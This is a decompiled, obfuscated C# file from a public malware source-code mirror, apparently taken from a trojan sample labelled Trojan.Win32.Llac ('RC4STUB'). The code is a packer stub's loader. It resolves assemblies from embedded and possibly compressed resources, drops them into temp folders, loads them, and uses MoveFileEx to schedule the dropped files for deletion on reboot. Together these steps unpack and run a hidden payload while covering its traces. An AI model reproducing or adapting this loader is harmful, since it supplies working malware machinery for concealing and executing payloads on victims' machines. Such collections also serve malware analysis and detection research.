mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
301 lines
10 KiB
C#
301 lines
10 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: RC4STUB, Version=1.0.0.0, Culture=neutral, PublicKeyToken=4bd99f8fe4adcd07
|
|||
|
// MVID: DA5B8577-1DEE-425A-83B8-F58DDD172F9B
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Llac.ajli-ac41d99cde54e36a4e446e9c8d3aecae2cd439033b269019f516b141753fb0e6.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Collections;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
namespace \u0003
|
|||
|
{
|
|||
|
internal class \u0002
|
|||
|
{
|
|||
|
private static Hashtable \u0001 = new Hashtable();
|
|||
|
|
|||
|
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
|
|||
|
private static extern bool \u0003([In] string obj0, [In] string obj1, [In] int obj2);
|
|||
|
|
|||
|
[SpecialName]
|
|||
|
internal static bool \u0003()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string lower = Process.GetCurrentProcess().MainModule.ModuleName.ToLower();
|
|||
|
if (lower == \u0001.\u0003.\u0003(319))
|
|||
|
return true;
|
|||
|
if (lower == \u0001.\u0003.\u0003(332))
|
|||
|
return true;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
return false;
|
|||
|
}
|
|||
|
|
|||
|
internal static void \u0003()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u0003.\u0002.\u0003);
|
|||
|
if (!Assembly.GetExecutingAssembly().GlobalAssemblyCache || !\u0003.\u0002.\u0003())
|
|||
|
return;
|
|||
|
string[] strArray = \u0001.\u0003.\u0003(353).Split(',');
|
|||
|
for (int index = 0; index < strArray.Length - 1; index += 2)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string str1 = Encoding.UTF8.GetString(Convert.FromBase64String(strArray[index]));
|
|||
|
string str2 = strArray[index + 1];
|
|||
|
if (str2.Length > 0)
|
|||
|
{
|
|||
|
if (str2[0] == '[')
|
|||
|
{
|
|||
|
int num = str2.IndexOf(']');
|
|||
|
string str3 = str2.Substring(1, num - 1);
|
|||
|
string name = str2.Substring(num + 1);
|
|||
|
bool flag = str3.IndexOf('z') >= 0;
|
|||
|
if (str3.IndexOf('f') >= 0)
|
|||
|
{
|
|||
|
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
|
|||
|
if (manifestResourceStream != null)
|
|||
|
{
|
|||
|
int length = (int) manifestResourceStream.Length;
|
|||
|
byte[] buffer = new byte[length];
|
|||
|
manifestResourceStream.Read(buffer, 0, length);
|
|||
|
if (flag)
|
|||
|
buffer = \u0002.\u0003.\u0003(buffer);
|
|||
|
try
|
|||
|
{
|
|||
|
string path1 = string.Format(\u0001.\u0003.\u0003(571), (object) Path.GetTempPath(), (object) name);
|
|||
|
Directory.CreateDirectory(path1);
|
|||
|
\u0003.\u0002.\u0001 obj = new \u0003.\u0002.\u0001(str1);
|
|||
|
string path2 = path1 + obj.\u0001 + \u0001.\u0003.\u0003(584);
|
|||
|
if (!File.Exists(path2))
|
|||
|
{
|
|||
|
FileStream fileStream = File.OpenWrite(path2);
|
|||
|
fileStream.Write(buffer, 0, buffer.Length);
|
|||
|
fileStream.Close();
|
|||
|
}
|
|||
|
\u0003.\u0003.\u0003(path2);
|
|||
|
try
|
|||
|
{
|
|||
|
File.Delete(path2);
|
|||
|
Directory.Delete(path1);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
internal static Assembly \u0003([In] object obj0, [In] ResolveEventArgs obj1)
|
|||
|
{
|
|||
|
\u0003.\u0002.\u0001 obj = new \u0003.\u0002.\u0001(obj1.Name);
|
|||
|
string base64String1 = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0003(false)));
|
|||
|
string[] strArray = \u0001.\u0003.\u0003(353).Split(',');
|
|||
|
string str1 = string.Empty;
|
|||
|
bool flag1 = false;
|
|||
|
bool flag2 = false;
|
|||
|
bool flag3 = false;
|
|||
|
for (int index = 0; index < strArray.Length - 1; index += 2)
|
|||
|
{
|
|||
|
if (strArray[index] == base64String1)
|
|||
|
{
|
|||
|
str1 = strArray[index + 1];
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
if (str1.Length == 0 && obj.\u0003.Length == 0)
|
|||
|
{
|
|||
|
string base64String2 = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0001));
|
|||
|
for (int index = 0; index < strArray.Length - 1; index += 2)
|
|||
|
{
|
|||
|
if (strArray[index] == base64String2)
|
|||
|
{
|
|||
|
str1 = strArray[index + 1];
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
if (str1.Length > 0)
|
|||
|
{
|
|||
|
if (str1[0] == '[')
|
|||
|
{
|
|||
|
int num = str1.IndexOf(']');
|
|||
|
string str2 = str1.Substring(1, num - 1);
|
|||
|
flag1 = str2.IndexOf('z') >= 0;
|
|||
|
flag2 = str2.IndexOf('g') >= 0;
|
|||
|
flag3 = str2.IndexOf('t') >= 0;
|
|||
|
str1 = str1.Substring(num + 1);
|
|||
|
}
|
|||
|
lock (\u0003.\u0002.\u0001)
|
|||
|
{
|
|||
|
if (\u0003.\u0002.\u0001.ContainsKey((object) str1))
|
|||
|
return (Assembly) \u0003.\u0002.\u0001[(object) str1];
|
|||
|
}
|
|||
|
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
|
|||
|
if (manifestResourceStream != null)
|
|||
|
{
|
|||
|
int length = (int) manifestResourceStream.Length;
|
|||
|
byte[] numArray = new byte[length];
|
|||
|
manifestResourceStream.Read(numArray, 0, length);
|
|||
|
if (flag1)
|
|||
|
numArray = \u0002.\u0003.\u0003(numArray);
|
|||
|
if (flag2)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string path1 = string.Format(\u0001.\u0003.\u0003(571), (object) Path.GetTempPath(), (object) str1);
|
|||
|
Directory.CreateDirectory(path1);
|
|||
|
string path2 = path1 + obj.\u0001 + \u0001.\u0003.\u0003(584);
|
|||
|
if (!File.Exists(path2))
|
|||
|
{
|
|||
|
Assembly assembly = (Assembly) null;
|
|||
|
FileStream fileStream = File.OpenWrite(path2);
|
|||
|
fileStream.Write(numArray, 0, numArray.Length);
|
|||
|
fileStream.Close();
|
|||
|
if (\u0003.\u0003.\u0003(path2))
|
|||
|
assembly = Assembly.Load(obj.\u0003(true));
|
|||
|
File.Delete(path2);
|
|||
|
Directory.Delete(path1);
|
|||
|
if ((object) assembly != null)
|
|||
|
{
|
|||
|
lock (\u0003.\u0002.\u0001)
|
|||
|
{
|
|||
|
if (\u0003.\u0002.\u0001.ContainsKey((object) str1))
|
|||
|
assembly = (Assembly) \u0003.\u0002.\u0001[(object) str1];
|
|||
|
else
|
|||
|
\u0003.\u0002.\u0001.Add((object) str1, (object) assembly);
|
|||
|
}
|
|||
|
return assembly;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
Assembly assembly1 = (Assembly) null;
|
|||
|
if (!flag3)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
assembly1 = Assembly.Load(numArray);
|
|||
|
}
|
|||
|
catch (FileLoadException ex)
|
|||
|
{
|
|||
|
flag3 = true;
|
|||
|
}
|
|||
|
catch (BadImageFormatException ex)
|
|||
|
{
|
|||
|
flag3 = true;
|
|||
|
}
|
|||
|
}
|
|||
|
if (flag3)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string path3 = string.Format(\u0001.\u0003.\u0003(571), (object) Path.GetTempPath(), (object) str1);
|
|||
|
Directory.CreateDirectory(path3);
|
|||
|
string path4 = path3 + obj.\u0001 + \u0001.\u0003.\u0003(584);
|
|||
|
if (!File.Exists(path4))
|
|||
|
{
|
|||
|
FileStream fileStream = File.OpenWrite(path4);
|
|||
|
fileStream.Write(numArray, 0, numArray.Length);
|
|||
|
fileStream.Close();
|
|||
|
\u0003.\u0002.\u0003(path4, (string) null, 4);
|
|||
|
\u0003.\u0002.\u0003(path3, (string) null, 4);
|
|||
|
}
|
|||
|
assembly1 = Assembly.LoadFile(path4);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
lock (\u0003.\u0002.\u0001)
|
|||
|
\u0003.\u0002.\u0001.Add((object) str1, (object) assembly1);
|
|||
|
return assembly1;
|
|||
|
}
|
|||
|
}
|
|||
|
return (Assembly) null;
|
|||
|
}
|
|||
|
|
|||
|
internal struct \u0001
|
|||
|
{
|
|||
|
public string \u0001;
|
|||
|
public Version \u0001;
|
|||
|
public string \u0002;
|
|||
|
public string \u0003;
|
|||
|
|
|||
|
public string \u0003([In] bool obj0)
|
|||
|
{
|
|||
|
StringBuilder stringBuilder = new StringBuilder();
|
|||
|
stringBuilder.Append(this.\u0001);
|
|||
|
if (obj0)
|
|||
|
{
|
|||
|
stringBuilder.Append(\u0001.\u0003.\u0003(593));
|
|||
|
stringBuilder.Append((object) this.\u0001);
|
|||
|
}
|
|||
|
stringBuilder.Append(\u0001.\u0003.\u0003(610));
|
|||
|
stringBuilder.Append(this.\u0002.Length == 0 ? \u0001.\u0003.\u0003(627) : this.\u0002);
|
|||
|
stringBuilder.Append(\u0001.\u0003.\u0003(640));
|
|||
|
stringBuilder.Append(this.\u0003.Length == 0 ? \u0001.\u0003.\u0003(665) : this.\u0003);
|
|||
|
return stringBuilder.ToString();
|
|||
|
}
|
|||
|
|
|||
|
public \u0001([In] string obj0)
|
|||
|
{
|
|||
|
this.\u0001 = new Version();
|
|||
|
this.\u0002 = string.Empty;
|
|||
|
this.\u0003 = string.Empty;
|
|||
|
this.\u0001 = string.Empty;
|
|||
|
string str1 = obj0;
|
|||
|
char[] chArray = new char[1]{ ',' };
|
|||
|
foreach (string str2 in str1.Split(chArray))
|
|||
|
{
|
|||
|
string str3 = str2.Trim();
|
|||
|
if (str3.StartsWith(\u0001.\u0003.\u0003(674)))
|
|||
|
this.\u0001 = new Version(str3.Substring(8));
|
|||
|
else if (str3.StartsWith(\u0001.\u0003.\u0003(687)))
|
|||
|
{
|
|||
|
this.\u0002 = str3.Substring(8);
|
|||
|
if (this.\u0002 == \u0001.\u0003.\u0003(627))
|
|||
|
this.\u0002 = string.Empty;
|
|||
|
}
|
|||
|
else if (str3.StartsWith(\u0001.\u0003.\u0003(700)))
|
|||
|
{
|
|||
|
this.\u0003 = str3.Substring(15);
|
|||
|
if (this.\u0003 == \u0001.\u0003.\u0003(665))
|
|||
|
this.\u0003 = string.Empty;
|
|||
|
}
|
|||
|
else
|
|||
|
this.\u0001 = str3;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|